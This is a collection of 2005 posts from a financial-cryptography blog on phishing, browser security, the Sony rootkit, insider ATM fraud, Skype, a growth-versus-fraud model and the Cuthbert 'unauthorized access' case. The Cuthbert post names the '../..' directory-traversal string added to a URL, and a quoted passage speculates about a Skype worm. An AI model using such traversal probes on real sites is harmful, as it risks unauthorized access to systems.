    2. Browser manufacturers have moved slightly faster than your average glacier. Microsoft moved forward by announcing that phishing was a browser problem (Mozilla and KDE followed 8 months later), and again by putting some tools into the IE7 release. Another big step forward was announcing the switch-off of SSL v2.

    But Microsoft also moved backwards one step IMO by going for the "shared database of phishing alerts" idea pioneered by Netcraft. Computer scientists and security gurus are still scratching their heads over how that is ever going to work, given that it never worked the other several hundred times we tried it. And another step backwards was announced as Microsoft went for an upgraded super-authentication concept for CAs. Those CAs that pass their upgraded rules will get rewarded by the CA's name on the browser, and the site will appear in green. Unfortunately, this confirms Microsoft in the position of super-CA, as they've now taken a position of judgement. Worse, it probably won't do anything to address the security problems we have now. As James Donald says, "the revenue model [for certificates] is based on sprinkling holy water over communications, rather than actually providing security. Hence the proposal to address phishing by providing higher priced grades of holy water."

    3. Data hacking blew American innocence away when Choicepoint revealed that they'd lost about 150,000 data sets to a guy with a stolen credit card. That's identities, to the plebeians. Instead of doing the right thing and looking sorry, they ducked and weaved. Unfortunately, the underlying spark was the California law that said you had to notify the victims. (Check out the full gory history at Adam's Choicepoint category)

    Within a month there were something like 6-8 large-scale copycat victim companies. The sudden knowledge of actual public attention and actual duty of care and actual potential for damages electrified the corporates like they'd received the other famous sentence from California - death row. The year rolled on, and by the time it hit 50,000,000 sets of data -- people, identities, you but not me -- analysts got bored and stopped counting. Basically, all of them, or as many as you'd ever need.

    4. Keylogging and malware and spyware slipped in and ruined -- totally and utterly destroyed -- any notion that *your Windows PC* was safe. It's a bit darn unfair as Microsoft did manage to improve the security of their most famous and most hackable platform, but to little avail.

    Underground rumour has had it for some time that corporates were also playing the same game using weaknesses deliberately left in by the manufacturer, and we got some great evidence when Sony was caught in the act. In order to protect some 32 or so of their CDs, they installed root kits across millions of machines (it's not really clear what it means to see half a million DNS servers).

    What's the significance of this? It totally destroys our cosy concept that the attacker is the bad guy and we are the good guys. If I had been caught putting a root kit on someone's machine, I'd have gone to jail, but apparently for Sony, that's not an issue. Security observers are learning the doublethink of one rule for Cuthbert and another rule for Sony.

    5. Although we saw the first signs of trouble for Mac OSX in late 2004, it failed to germinate. Macs reached 5% of the market, better than they'd done for a long time. Mac users had peace - in our time, their time, and, if things keep going as they are, in their children's time.

    6. Security observers exhibited surprise at how phishing had emerged. SANS still doesn't list it as a threat, but they did decide that Apple's OS X was one, primarily because it now has 5% of the market. It's an odd way to do security - punish for popularity - but SANS is popular with its members and training courses sell well. Expect them to list phishing as a threat when the phishers have also reached 5% of the market.

    7. In the good news section, Apple's music sales boomed. Primarily, their great business achievement was managing to walk a line between the cash cow mentality of the music owners and the china-shop bull attitude of Internet mp3 users. Also, not to be underestimated as a core driver of their success, they got the interface and technology right enough that it is relatively seamless - rumour has it, it just works.

    8. Although Apple's tune was heard loud and clear, file sharing systems continued to romp. Growth continued unabated, and by some estimates, 30% of all bandwidth on the net is consumed by these systems. That's success! But it also means that they are now facing limits to growth themselves. Prosecutions continued, but seemed to do nothing towards growth of file sharing or growth of music sales (either on or off net).

    9. Firefox continued to grow, reaching about 10% of the market by the end of the year. Riding on a completely new build, some solid software engineering and some adroit choices not to follow the Microsoft "innovations" in insecurity like ActiveX, their growth was joyously exponential. Being the one compatible browser across all major platforms did no harm either - corporates now find that they can install it everywhere, and Linux, BSD, OSX *and* Windows users are happy together at last.

    Oh, and I forgot to mention - Mozilla went commercial.

    10. Another slow year in Financial Cryptography. Paypal grew, but fractured more and more along jurisdictional lines. e-gold survived. Actually that's unfair: they survived in 2004 and grew in 2005, but still nobody knows how. Goldmoney surpassed it in total value under management, but kept mum about transactions. Industry scuttlebutt has it that the bell doesn't ring much. Exchange traded funds are now routine, as model copies of DGCs within the stock market regime.

    11. The surprise entry is WebMoney. This Russian-based company keeps popping up above the radar with solid report after solid report. They seem to have adopted many of the lessons of actual real financial cryptography and are even market leaders in some areas. They are the _only ones with low cost arbitration_ -- a development we've been praying for, for about 5 years now, in the forum of LexCybernatoria conferences -- and rumour has it that they've actually moved into the distributed issuance space, something that I bet the farm on in 1995 or so.

    How did they do all this? By following Iang's rule number one of market growth, I'd guess: shut the f*** up and work for your customers. Or maybe it was simply because all their press releases are in Russian and only Dany has the time to translate them.

    12. The year of the smart card was not announced. The year of RFIDs was announced. Neither seemed to make any difference, as yet.

    13. Grid became commonplace in the news, as did Virtualisation. The latter has security connotations in that you can now partition off all those dodgy PHP apps on the net. But wait, there's a catch - once you virtualise, they are really separate machines! So it is not clear to me yet how this does any more than firewall and contain the insecurity of webapps. OTOH, I'm impressed by the buzz, and I argue we should be doing the same thing within Apache - sharing multiple SSL servers over one IP# (still not practical...).

    14. In cryptography, the big news was that Skype romped into being the all-time world champion at spreading crypto to the masses, only to be bought by eBay. The drums of cryptowar continue to murmur with today's news that the NSA now spies domestically, so expect the NSA to negotiate a pass with Skype. Also, message digests continue to be all messed up, but it doesn't affect us in app space yet. NIST has still not announced a path forward in message digests nor the venerable Digital Signature Algorithm / Standard.

    15. My predictions back in 2005 - The Year of the Snail - weren't so bad. Predictions for next year coming up, if there is time before it hits us.

    Thanks all to the readers!


    Addendum: Some other predictions I've seen:

    • tqbf's Pro-Forma '05-'06 Punditry Results: http://www.sockpuppet.org/tqbf/log/2005/12/pro-forma-05-06-punditry-results.html
    Posted by iang at 02:25 PM | Comments (2) | TrackBack

    December 13, 2005

    GP2 - Growth and Fraud - Instructing Security at GP

    In the previous discourse (Meet at the Grigg Point), we discussed how growth works, and said that GP was the tipping point at which the demo became a system. From this model, we can make a number of observations, chief of which is about Security to which we now turn.

    One of the security practitioner's favourite avisos is to suggest that security be done up front, completely, securely, with strong integration, not to mention obeisance. Imagine the fiercely wiggling finger at this point. Yet, this doctrine has proven to be a disaster and the net's security pundits are in the doldrums over it all. Let's examine some background before getting to how GP helps us with this conundrum.

    Hark to the whispering ghosts of expired security projects. Of those that took heed of the doctrine, most failed, and we do mean most - completely and utterly. Space does not permit a long list of them, but it is fair to say that one factor (if not the sole or prime factor) is that they spent too much on security and not enough on the biz.

    Some systems succeeded though, and what of them? These divide into three:

    1. those that implemented the full model,
    2. those that implemented a patchwork or rough security system, and
    3. those that did nothing.

    Of those few systems that heeded the wiggling finger and succeeded, we now have some substantial experience. Heavily designed and integrated systems that succeeded initially went on to expose themselves to ... rather traumatic security experiences. Why? In the worst cases, when the fraud started up (around GP) it simply went around the security model, but by that time the model was so cast in mental concrete that there was no flexibility to deal with it. One could argue that these models stopped other forms of fraud, but these arguments generally come from managers who don't admit the existence of the current fraud, so it's an argument designed to be an argument, not something that pushes us forwards.

    Perversely, those systems that did nothing had an easier time of it than even those that implemented a patchwork, because they had nothing to battle.


    fig 4. Investment directs the Revenue Curve

    Why is this? I conjecture that at the beginning of a project the business model is not clear. That is, none of us really knows what to do, but darn it we're inspired! Living and dreaming in Wonderland as we are, this suggests that the business model migrates very quickly, which means that it isn't plausible to construct a security model that lasts longer than a month. Which means several interlinked things, among them restarts and kickback.

    Now, anyone who's aware of compounding knows where to put the value: into building the business. Security rarely if ever builds business; what it does is protect business that is already there. It's the issue of compounding we turn to now. Figure 4 depicts the cost of investment down below the horizontal axis, and the growth above. Investment isn't exponential, so on this log chart it's not a straight line. Initially it grows well, but then hits limits to growth which doom it to sub-exponential growth - which is probably just as well, as any investor I've met prefers less than exponential growth in contributions!

    While not well depicted in that figure, consider that the pattern of investment fundamentally sets the growth model. The Orange line dictates the slope and placement of the Blue!

    Now let's fiddle a bit in figure 5. Assume that investment is fixed. But we've decided to invest upfront in a big way in security, because that's what everyone said was the only way to sleep well at nights. Now the Orange Region of total investment over time is divided into two - above the thin line is what we invest in the business, and below the line is the security. The total is still the same, so security investment has squeezed us upfront.


    fig 5. More Costs means Growth is Flatter and GP is Later

    See what happens? Because resources were directed away from business, into security, the growth curve started later, and when the security model kicked in, the curve flattened out. That's because all security has a cost. If you're lucky, and your security team is hot (and I really do mean blistering here, see what I wrote about "most" above...) the kink won't be measurable.
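    For the curious, here's a toy sketch of figures 4 and 5 in Python. Every constant is invented for illustration; the only mechanism modelled is that business spend compounds while security spend does not:

        # Toy model: fixed total spend per month; the second scenario diverts
        # half of the first year's spend into security, which doesn't compound.
        GROWTH = 1.15       # assumed monthly compounding on business value
        SPEND = 100         # assumed fixed total investment per month
        GP = 100_000        # assumed value at the tipping point

        def months_to_gp(security_share, security_months):
            value, month = 0.0, 0
            while value < GP:
                month += 1
                spend = SPEND
                if month <= security_months:
                    spend *= (1 - security_share)   # the rest goes to security
                value = value * GROWTH + spend      # only business spend compounds
            return month

        print("all-business  :", months_to_gp(0.0, 0), "months to GP")
        print("security-first:", months_to_gp(0.5, 12), "months to GP")

    With these made-up constants the security-first run reaches GP several months later - the compounding it forgoes up front is never recovered.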

    Why is it so big? And why don't managers wade in there with mallet and axe and bash it back into forward growth before we can say hedonism is the lifeblood of capitalism? Oddly, the chances of a manager seeing it are pretty remote, because seeing drivers to growth is a very hard art; most people just can't see things like that, and assume that either today goes on for ever, or tomorrow will solve everything. The end users often notice it, and respond in one of two ways: they scream and holler, or they stop using the system. An example of the former is from the old SSL days when businesses screamed that it sucked up 5 times the CPU ... so they switched to hybrid SSL/raw sites. An example of the latter is available every time you click on a link and it asks you to register for your free or paid account to read an article or to respond to an article.

    Students of security will be crying foul at this point, because security does good. So they say. In fact what it does is less bad: until we draw in the fraud curve - the bad that security nicely attempts to alleviate - security is just a cost. And a deadweight one at that. Which brings us to our third observation: the upfront attention to security has pushed GP way over to the right, as it must do if you agree with the principle of GP.

    So where is all this leading us? At this point we should understand that security is employed too early if employed at the beginning - the costs incur a dramatic shift of the growth curve, both to the right and a flattening due to the additional drain. And we haven't even drawn in the other points above: restarts and kickback.

    This logic says that we should delay security as long as we can, but this can't go on forever. The point where the security really kicks in and does less bad is when the bad kicks in: the fraud curve that slides up and explodes after GP. So the ideal point at which to kick in security is after GP and before the fraudulent red line runs in ink onto the balance sheet.

    Which leads us to the question - finally, for some, no doubt - when is GP? That is saved for another day :-)

    Posted by iang at 07:22 PM | Comments (1) | TrackBack

    December 12, 2005

    FUDWatch - US Treasury builds up for intervention in Internet Governance?

    The US treasury has apparently launched an attack on Internet governance with a FUD claim:

    RIYADH (Reuters) - Global cybercrime generated a higher turnover than drug trafficking in 2004 and is set to grow even further with the wider use of technology in developing countries, a top expert said on Monday. No country is immune from cybercrime, which includes corporate espionage, child pornography, stock manipulation, extortion and piracy, said Valerie McNiven, who advises the U.S. Treasury on cybercrime.
    "Last year was the first year that proceeds from cybercrime were greater than proceeds from the sale of illegal drugs, and that was, I believe, over $105 billion," McNiven told Reuters. Cybercrime is moving at such a high speed that law enforcement cannot catch up with it."

    For example, Web sites used by fraudsters for "phishing" -- the practice of tricking computer users into revealing their bank details and other personal data -- only stayed on the Internet for a maximum of 48 hours, she said.

    Lumping in "corporate espionage, child pornography, stock manipulation, extortion and piracy" with cybercrime is like saying that roads and cars are responsible for bank robberies, because most bank robberies use a getaway vehicle. The US Treasury needs to be told that if they make stupid statements then their reputation is likely to suffer. I suppose they'll be blaming the rise in their T-bills interest on cybercriminals next.

    Posted by iang at 09:24 AM | Comments (3) | TrackBack

    December 11, 2005

    GP1 - Growth and Fraud - Meet at the Grigg Point

    Imagine if you will a successful FC system on the net. That means a system with value, practically; but for the moment, keep your favourite payments system close in your mind. Success means solid growth, beyond some point of survival, into the area where growth is assured. It looks like this:


    fig 1. Exponential Growth

    That's an exponential curve, badly drawn by hand. It's exponential because that's what growth means; all growth and shrinkage is exponential. Let's redraw it on a logarithmic scale, so we see a straight line:


    fig 2. Growth Crosses the Value Tipping Point

    I've observed in many businesses of monetary nature that there is a special tipping point. This is where the system transitions from being a working demo that is driven forwards by the keenness of its first 100 or so users, to being a system where the value in the system is inherent and cohesive. In and of itself, the value in the system is of such value that it changes the dynamics of the system.

    That's why I labelled it the Self-Sustaining Value Growth Tipping Point, or GP for short. Before this point, the system will simply stop if we the founders or we the users stop pushing. After this point, there is a sustained machine that will keep rolling on, creating more and more activity. In short, it's unstoppable, at least as compared to beforehand.

    The shortened term indicates who to blame when you reach that point, because there is something else that is going to happen here: fraud! When the system passes GP, and the value in it is now inherently stealable, then someone will come along and try to steal it.


    fig 3. Fraud Kicks Off then Levels Off

    And that theft will probably work, if history is any judge. You'll get a rash of frauds breaking out, either insider or outsider fraud, and all will appear to be chaos. Actually, it's not chaos, it's just competition between different fraud models, and soon it will settle down to a set of best practices in fraud. At this point, when all the mistakes have been made and the surviving crooks know what they are about, fraud will rise rapidly, then asymptotically approach its long run standard level. Ask any credit card company.

    Remember that the graph above has a logarithmic vertical axis, so small vertical distances mean big differences in absolute amounts. The long run gap between those lines - red to blue - is about two if the vertical axis is log 10. Assuming that, 10^2 gives us 100, which means fraud is 1% of the total at any time. 1% is a good benchmark, a great number to use if you have no other number, even if the preceding mathematics are rather ropey. Some systems deliver less, some deliver more, it all depends, but we're in the right area for a log chart.
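    To make the arithmetic explicit, here's a minimal sketch in Python. The numbers are purely illustrative; the only content is that a constant vertical gap on a log-10 chart is a constant ratio:

        def fraud_fraction(log10_gap):
            """Fraction of total value lost to fraud, given the vertical
            gap between the blue and red lines on a log-10 chart."""
            return 1.0 / (10 ** log10_gap)

        for gap in (1.0, 2.0, 3.0):
            print(f"gap of {gap} decades -> fraud is {fraud_fraction(gap):.2%} of total")

        # a gap of 2.0 decades -> 1.00%, the benchmark quoted above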

    Now that we have the model in place, what can we do with GP? Quite a lot, it seems, but that waits for the next exciting installment of Growth and the Big GP!


    This is Part 1 of Growth and Fraud.

    Posted by iang at 03:21 PM | Comments (4) | TrackBack

    November 25, 2005

    Browser Manufacturers share anti-phishing tricks - Farce, Soap, and 3 great things

    News comes from multiple places that the Browser manufacturers (Microsoft, KDE, Mozilla, Opera) got together and displayed their anti-phishing techniques to each other. It was yet another private meeting, where the people who've done good research on anti-phishing weren't involved - a sure sign that this is not only about phishing. I'd reckon we need one more meeting before the penny drops on that one.

    Consensus seems to have emerged that changing the colour of the URL bar is a good idea. Now they have to decide on whether it would be confusing to have different colours (compete on security?!) or compatible colours (all browsers must be equal!?). Let's assume that Microsoft wins by normal fiat: White means nothing, Yellow means suspicious, Green means "high assurance assured" and Red means "confirmed phishing site".

    Which means Mozilla has to go back and rethink its colours, or risk a confusing user experience - and avoiding that happens to be a higher goal than security for Mozilla. As I sit and type these words, my URL bar is yellow for TLS and green for Petname good; if I was an IE7 user, I'd be confused.

    All is not soap opera and colour wars - three great things have happened. Firstly, Microsoft has decided to put the CA name on the chrome. They've placed it in the URL bar, when it is coloured green (rotating the CA name with the site name). That is fantastic news, both for Microsoft and for users. For the former, as it clearly indicates who says this is a good site, Microsoft is off the hook, legally. Expect the others to follow suit, when they work out why this is good for them. For the users, it now enables them to prepare for the substitute CA attack, something we haven't seen yet, but it was always possible (due to a bug in PKI).

    Secondly, George of KDE writes:

    All agreed to push ahead with plans to introduce stronger encryption protocols. "With the availability of bot nets and massively distributed computing, current encryption standards are showing their age," Staikos writes. "Prompted by Opera, we are moving towards the removal of SSLv2 from our browsers. IE will disable SSLv2 in version 7 and it has been completely removed in the KDE 4 source tree already."

    SSL v2 must die! Silly reasons, but the result is what we want - SSL v2 must die. And if they think it is about 40-bit crypto algorithms, who are we to point out that, 9 years after the cute demo by a couple of bored students, crooks are too busy stealing money from browser users to bother with cool things like breaking crypto with their otherwise gainfully employed botnets... But did we say, SSL v2 must die (if only so I can fix the bloody cert on my own site to share domains)?

    Thirdly, three - make that four! - of five browser manufacturers (1, 2, 3) now admit that phishing is an attack on the browser. We can now get on with the real work of strengthening the browser, and ignore all the nonsense about social engineering, bad banks that send out silly emails, and hoping that crooks will follow yet more silly regulations. That's not to say that these things aren't relevant, but they are not core. The core of the attack is against the browser.

    In the past few years the Internet has seen a rapid growth in phishing attacks. There have been many attempts to mitigate these types of attack, but they rarely get at the root of the problem: fundamental flaws in Internet architecture and browser technology. Throughout this year I had the fortunate opportunity to participate in discussions with members of the Internet Explorer, Mozilla/FireFox, and Opera development teams with the goal of understanding and addressing some of these issues in a co-operative manner.

    Thank you George! Right on track with IE7's release, things are starting to move along. Strategically, it is pretty clear that Microsoft owns browser space, and for reasons not explained today, is deciding to play open and cooperative for the moment. I think that's probably as good as it gets right now, as it is pretty clear that when it comes to matters security, the browser manufacturers need a leader. Microsoft has the most to lose in this game, so by default, is the leader.

    PS: I would be remiss if I didn't mention the debate on "high assurance" certificates and trying to pin phishing on the CAs. Nonsense and Farce! Get a clue, guys! If that was going to work then the current setup would have already dealt with it. The reason it doesn't and won't work is because the PKI is all smoke and mirrors, and adding another mirror and lighting another fire won't improve the stability and strength of the PKI.

    Posted by iang at 04:36 AM | Comments (8) | TrackBack

    November 21, 2005

    Frank Hecker goes to the Mountain - mapping the structure of the Certificate Authority

    Frank takes aim at the woeful business known as certificate authorities in an attempt to chart out their structural elements and market opportunities.

    Frank argues that CAs can be viewed as providers of one of: encryption, DNS fixes, site identity proofs, or anti-fraud services. Depending on which you choose, this has grave ramifications for what follows next -- Frank's thesis implicitly seems to be that only one of those can be pursued, and each has severe problems, if not inescapable and intractable contradictions. In the meantime, what is a browser manufacturer supposed to do?

    For those who have followed the PKI debate this will not surprise. What is stunningly new -- as in news -- is that this is the first time to my knowledge that a PKI user organisation has come out and said "we have a problem here, folks!" Actually, Frank doesn't say that in words, but if you understand what he writes, then you'd have to be pre-neanderthalic not to detect the discord.

    What to do next is not clear -- so it would appear that this essay is simply the start of the debate. That's very welcome, albeit belated.

    Posted by iang at 06:33 PM | Comments (1) | TrackBack

    November 06, 2005

    ACM Interactions - special issue on Security

    Submissions Deadline: February 1st, 2006
    Publications Issue: May+June 2006 Issue
    PDF: here but please note that it causes lockups.

    Interactions is published bi-monthly by the Association for Computing Machinery (ACM) for designers of interactive products. It is a magazine that balances articles written for professionals and researchers alike, providing broad coverage of topics relevant to the HCI community.

    The May+June 2006 issue of Interactions is dedicated to the user experience around security in information systems. Designing systems that are both secure and usable offers unique challenges to interaction designers. System complexity, user acceptance and compliance, and decisions about protection versus convenience all factor into the design process and resulting effectiveness of security systems in the hands of users.

    Interactions invites authors to submit case studies and articles related to the security user experience. Papers should be written in a reader-friendly magazine style and tone as opposed to a conference proceedings or journal style (no abstracts, appendices, etc).

    Relevant contributions will address issues related, but not limited to, the following:

    Interactions invites papers in the following two formats:

    1. Case Studies 7-9 pages. Case Studies are reports on experiences gained and lessons learned designing, using, or studying security components/systems or techniques. They take a comprehensive view of a problem from requirements analysis through design, implementation, and use.
    2. Articles 1-3 pages. Articles are much shorter and broader than case studies, and may present research findings, points of view, social or philosophical inquiries, novel interface designs, or other information relevant to the HCI community regarding security and the user experience.

    Papers that appear in Interactions are archived in the ACM Digital Library and available online. The Special Issue on Security will appear in the May+June 2006 issue of Interactions and the deadline for submissions is February 1st, 2006.

    For more information about submission guidelines or appropriate topics, contact ryan.west@sas.com.

    Posted by iang at 08:15 AM | Comments (0) | TrackBack

    November 01, 2005

    Sony v. their customers - who's attacking who?

    In another story similar in spirit to the Cuthbert case, Adam points to Mark who discovers that Sony has installed malware into his Microsoft Windows OS. It's a long technical description which will be fun for those who follow p2p, DRM, music or windows security. For the rest I will try and summarise:

    Mark bought a music disk and played it on his PC. The music disk installed a secret _root kit_, which is a programme that executes with privileges and takes control of Microsoft's OS in unknown and nefarious ways. In this case, its primary purpose was to stop Mark playing his purchased music disk in various ways.

    The derivative effects were a mess. Mark knows security so he spent a long time cleaning out his system. It wasn't easy, well beyond most Windows experts, even ones with security training, I'd guess. (But you can always reformat your drive!)

    No hope for the planet there, then, but what struck me was this: Who was attacking who? Was Sony attacking Mark? Was Mark attacking Sony? Or maybe they were both attacking Microsoft?

    In all these interpretations, the participants did actions that were undesirable, according to some theory. Yet they had pretty reasonable justifications, on the face of it. Read the comments for more on this; it seems that the readers for the most part picked up on the dilemmas.

    So, following Cuthbert (1, 2, 3) both could take each other to court, and I suppose Microsoft could dig in there as well. Following the laws of power, Sony would win against Mark because Sony is the corporation, and Microsoft would win against Sony, because Microsoft always wins.

    Then, there is the question of who was authorised to do what? Again, confusion reigns, as although there was a disclaimer on the merchant site that the disk had some DRM in it, what that disclaimer didn't say was that software that would be classified as malware would be installed. Later on, a bright commenter reported that the EULA from the supplier's web site had changed to add a clause saying that software would be added to your Windows OS.

    I can't help being totally skeptical about this notion of "authorisation." It doesn't pass the laugh test - putting a clause in an EULA just doesn't seem to be adequate "authorisation" to infect a user's machine with a rootkit, yet again following the spirit of Cuthbert, Sony would be authorised because they said they were, even if after the fact. Neither does the law that "unauthorises" the PC owner to reverse-engineer the code in order to protect his property make any sense.

    So where are we? In a mess, that's where. The traditional security assumptions are being challenged, and the framework to which people have been working has been rent asunder. A few weeks ago the attackers were BT and Cuthbert, on the field of Tsunami charity; now it's Sony and Mark, on the field of Microsoft and music. In the meantime, the only approach that I've heard make any sense is the Russian legal theory as espoused by Daniel: Caveat Lector. If you are on the net, you are on your own. Unfortunately most of us are not in Russia, so we can't benefit from the right to protect ourselves, and have to look to BT, Sony and Microsoft to protect us.

    What a mess!

    Addendums:

    And in closing, I just noticed this image of Planet Sony Root Kit over at Adam's entry:


    Posted by iang at 05:55 AM | Comments (2) | TrackBack

    October 26, 2005

    Breaking Payment Systems and other bog standard essentials

    Many people have sent me pointers to How ATM fraud nearly brought down British banking. It's well worth reading as a governance story; it's as good a one as I've ever seen! In this case, a fairly bog standard insider operation in a major Brit bank (not revealed, but I guess everyone knows which one) raided some 2000 user accounts and probably more. They did all this through the bank's supposedly fool-proof transaction system, and the bank aided and abetted by refusing to believe there was an issue! Further, given the courts' willingness to protect the banks' secrecy, one can say that the courts also aided and abetted the crooks.

    This is the story of how the UK banking system could have collapsed in the early 1990s, but for the forbearance of a junior barrister who also happened to be an expert in computer law - and who discovered that at that time the computing department of one of the banks issuing ATM cards had "gone rogue", cracking PINs and taking money from customers' accounts with abandon.

    This is bog standard. Once a system grows to a certain point, insider fraud is almost a given, and it is to this that the wiser FCer turns. As I say, this is a must-read, especially if you are new to FC. Here's news for local currency pundits on how easy it is to forge basic paper tokens.

    In a world of home laser printers and multimedia PCs, counterfeiting has become increasingly easy. With materials available at any office supply store, those with a cursory knowledge of photo-editing software can duplicate the business-card-size rewards cards once punched at Cold Stone Creamery or the stamps once given out at Subway sandwich shops...

    Steven Bellovin reports that Skype have responded to criticisms over their "secret cryptoprotocol."

    Skype has released an external security evaluation of its product; you can find it at http://www.skype.com/security/files/2005-031%20security%20evaluation.pdf (Skype was also clueful enough to publish the PGP signature of the report, an excellent touch -- see http://www.skype.com/security/files/2005-031%20security%20evaluation.pdf.sig) The author of the report, Tom Berson, has been in this business for many years; I have a great deal of respect for him.
    --Steven M. Bellovin, http://www.cs.columbia.edu/~smb

    Predictably, people have pored over the report and criticised that too, but most have missed the point that unless you happen to have an NSA-built phone on your desk, it's still more secure than anything else you have available. More usefully, Cubicle reports that there is an update to Skype that repairs a few bugs. As he includes some analysis of how to exploit the bugs and create some worms... it might be worth planning on updating:

    The Blackhat in me salivates at the prospect. It’s beautiful security judo, leveraging tools designed to protect confidentiality (crypto) and Availability (peer-to-peer) to better hide my nefarious doings. Combine it with a skype API-based payload and you’ve got a Skype worm that can leverage the implicit trust relationship of contact lists to propagate further, all potentially wrapped inside Skype’s own crypto.

    Too bad the first that most of Skype’s 60 million-and-growing users will ever hear of it will be after someone who does pay attention to these sorts of things decides they want to see if it’s possible to create a 60-million node botnet or retire after making The One Big Score with SkypeOut and toll fraud.

    Hey Skype, Ignoring Risk is Accepting Risk–NOT Avoiding it. Put this on your main page while upgrading is still prevention rather than incident response.

    A little hyperventilated, but consider yourself in need of a Skype upgrade.

    Posted by iang at 03:08 PM | Comments (1) | TrackBack

    October 25, 2005

    Microsoft scores in anti-phishing!

    Finally, some good news! Matthias points out that Microsoft has announced that they are switching to TLS in browsers. Hooray! This means no more SSL v2, and the other lackadaisical dinosaurs of the browser world can be expected to shuffle into line (Mozilla, Safari, Konqueror, Opera... yes, you may well look down in shame, especially Mozilla, which was facing a bombardment of clues).

    I have a sneaking suspicion that Microsoft actually are thinking a bit - not hugely, but a bit - about phishing, and are looking at some of the easier ways to deal with it. First, they acknowledged that phishing was a browser problem, and no other browser supplier to my knowledge has done that. Secondly, they mention phishing and security in the same breath from time to time, while the other guys are still stuck on patch counts and bug statistics and similar side issues. Thirdly:

    As part of Microsoft's "secure by default" design philosophy, IE7 will block encrypted web sessions to sites with problematic (untrusted, revoked or expired) digital certificates. Users will receive a warning when they visit potentially insecure sites, which users can choose to ignore, except where certificates are revoked. "If the user clicks through a certificate error page, the address bar will flood-fill with red to serve as a persistent notification of the problem," Lawrence explained.

    Huh. Not a bad idea, that, although note that it is logically the reverse of what the Petname and Trustbar people do! (Debates can be had, and more could be done, but a start is a start!) Fourthly:

    The Beta 2 version of IE7 also changes the way non secure content is rendered in a secure web page. IE7 renders only the secure content by default but it offers surfers the chance to unblock the nonsecure content on a secure page using the Information Bar.

    Fifthly, dropping SSL v2 as default: it's hard to concisely draw the complex connection between TLS and phishing, but it's easy to show its general or two-step effects. Microsoft makes a game attempt at this:

    Lastly, the TLS implementation has been updated to support Extensions as described in RFC 3546. TLS extensions improve performance, and add capabilities to the TLS protocol. The most interesting of the extensions is the Server Name Indication (SNI) extension, as it resolves one of the long-standing limitations for HTTPS hosting.

    A little background: When a web browser initiates a HTTPS handshake with a web server, the server immediately sends down a digital certificate. The hostname of the server is listed inside the digital certificate, and the browser compares it to the hostname it was attempting to reach. If these hostnames do not match, the browser raises an error.

    The matching-hostnames requirement causes a problem if a single-IP is configured to host multiple sites (sometimes known as “virtual-hosting”). Ordinarily, a virtual-hosting server examines the HTTP Host request header to determine what HTTP content to return. However, in the HTTPS case, the server must provide a digital certificate before it receives the HTTP headers from the browser. SNI resolves this problem by listing the target server’s hostname in the SNI extension field of the initial client handshake with the secure server. A virtual-hosting server may examine the SNI extension to determine which digital certificate to send back to the client.

    I told you it wasn't easy to explain ... in short, this means that many more ordinary sites can now use HTTPS to protect content, which speeds up the general availability of TLS (was SSL) which then kicks back and means browsers and plugins can protect against phishing. Top banana!
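    For the technically minded, here's the client side of SNI as it looks with today's tools - a sketch using modern Python's standard ssl module (which postdates this post by some years); the hostname is a placeholder:

        import socket, ssl

        ctx = ssl.create_default_context()

        with socket.create_connection(("www.example.com", 443)) as sock:
            # server_hostname is what puts the target's name into the initial
            # handshake, so a virtual-hosting server can pick the matching
            # certificate before any HTTP headers have been sent
            with ctx.wrap_socket(sock, server_hostname="www.example.com") as tls:
                print(tls.version())
                print(tls.getpeercert()["subject"])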

    Last week there was a general panic issued at core Internet level - SSL v2 in OpenSSL had a flaw in it. Unfortunately, as there was no capability to turn off SSL v2 within OpenSSL, the problem turned into a schmozzle as OpenSSL is both incorporated in many packages, and also distributed in many forms. Maybe this discussion tipped the balance: get rid of SSL v2 everywhere.

    Hat tip to Microsoft for having the guts to do what no other company or open source group did.

    Posted by iang at 06:12 PM | Comments (3) | TrackBack

    Security Professionals Advised to Button Lips

    Nick pointed me to his Cuthbert post, and I asked where the RSS feed was, adding "I cannot see it on the page, and I'm not clued enough to invent it." To which he dryly commented "if you tried to invent it you'd arguably end up creating many 'unauthorized' URLs in the process...."

    Welcome to the world of security post-Cuthbert. He raises many points:

    Under these statutes, the Web equivalent of pushing on the door of a grocery store to see if it's still open has been made a crime. These vague and overly broad statutes put security professionals and other curious web users at risk. We depend on network security professionals to protect us from cyberterrorism, phishing, and many other on-line threats. These statutes, as currently worded and applied, threaten them with career ruin for carrying out their jobs. Cuthbert was convicted for attempting to determine whether a web site that looked like British Telecom's payment site was actually a phishing site, by adding just the characters "../.." to the BT site's URL. If we are to defeat phishing and prevent cyberterrorism, we need more curious and public-spirited people like Cuthbert.

    Meanwhile, these statutes generally require "knowledge" that the access was "unauthorized." It is thus crucial for your future liberty and career that, if you suspect that you are suspected of any sort of "unauthorized access," take advantage of your Miranda (hopefully you have some similar right if you are overseas) right to remain silent. This is a very sad thing to have to recommend to network security professionals, because the world loses a great deal of security when security professionals can no longer speak frankly to law-enforcement authorities. But until the law is fixed you are a complete idiot if you flap your lips [my emphasis].

    Point! I had not thought so far, although I had pointed out that security professionals are now going to have to raise fingers from keyboards whenever in the course of their work they are asked to "investigate a fraud."


    Consider the ramifications of an inadvertent hit on a site - what are you going to do when the Met Police comes around for a little chat? Counsel would probably suggest "say nothing." Or more neutrally, "I do not recollect doing anything on that day .. to that site .. on this planet!" as the concept of Miranda rights is not so widely encouraged outside the US. Unfortunately, the knock-on effect of Cuthbert is that until you are apprised of the case in detail -- something that never happens -- you will not know whether you are a suspect or not, and your only safe choice is to keep your lips buttoned.

    Nick goes on to discuss ways to repair the law, and while I agree that this would be potentially welcome, I am not sure whether it is necessary. Discussion with the cap-talk people (the most scientific security group that I am aware of, but not the least argumentative!) has led to the following theory: the judgement was flawed because it was claimed that the access was unauthorised. This was false. Specifically, the RFC authorises the access, and there is no reasonable theory to the alternative, including any sign on the site that explains what is authorised and what is not. The best that could be argued - in a spirited defence by devil's advocate Sandro Magi - is that any link not provided by the site is unauthorised by default.

    In contrast, there is a view among some security consultants that you should never do anything you shouldn't ever do, which is more or less what the "unauthorised" claim espouses. On the surface this sounds reasonable, but it has intractable difficulties. What shouldn't you ever do? Where does it say this? What happens if it *is* a phishing site? This view is neither widely understood by the user public nor plausibly explained by the proponents of that view, and it would appear to be a cop-out in all senses.

    Worse, it blows a hole in the waterline of any phishing defence known to actually work - how are we going to help users to defend themselves if we ourselves are skating within cracking distance of the thin ice of Cuthbert? Unfortunately, explaining why it is not a rational theory in legal, economic or user terms is about as difficult as having an honest discussion about phishing. Score Cuthbert up as an own-goal for the anti-phishing side.

    Posted by iang at 05:14 PM | Comments (3) | TrackBack

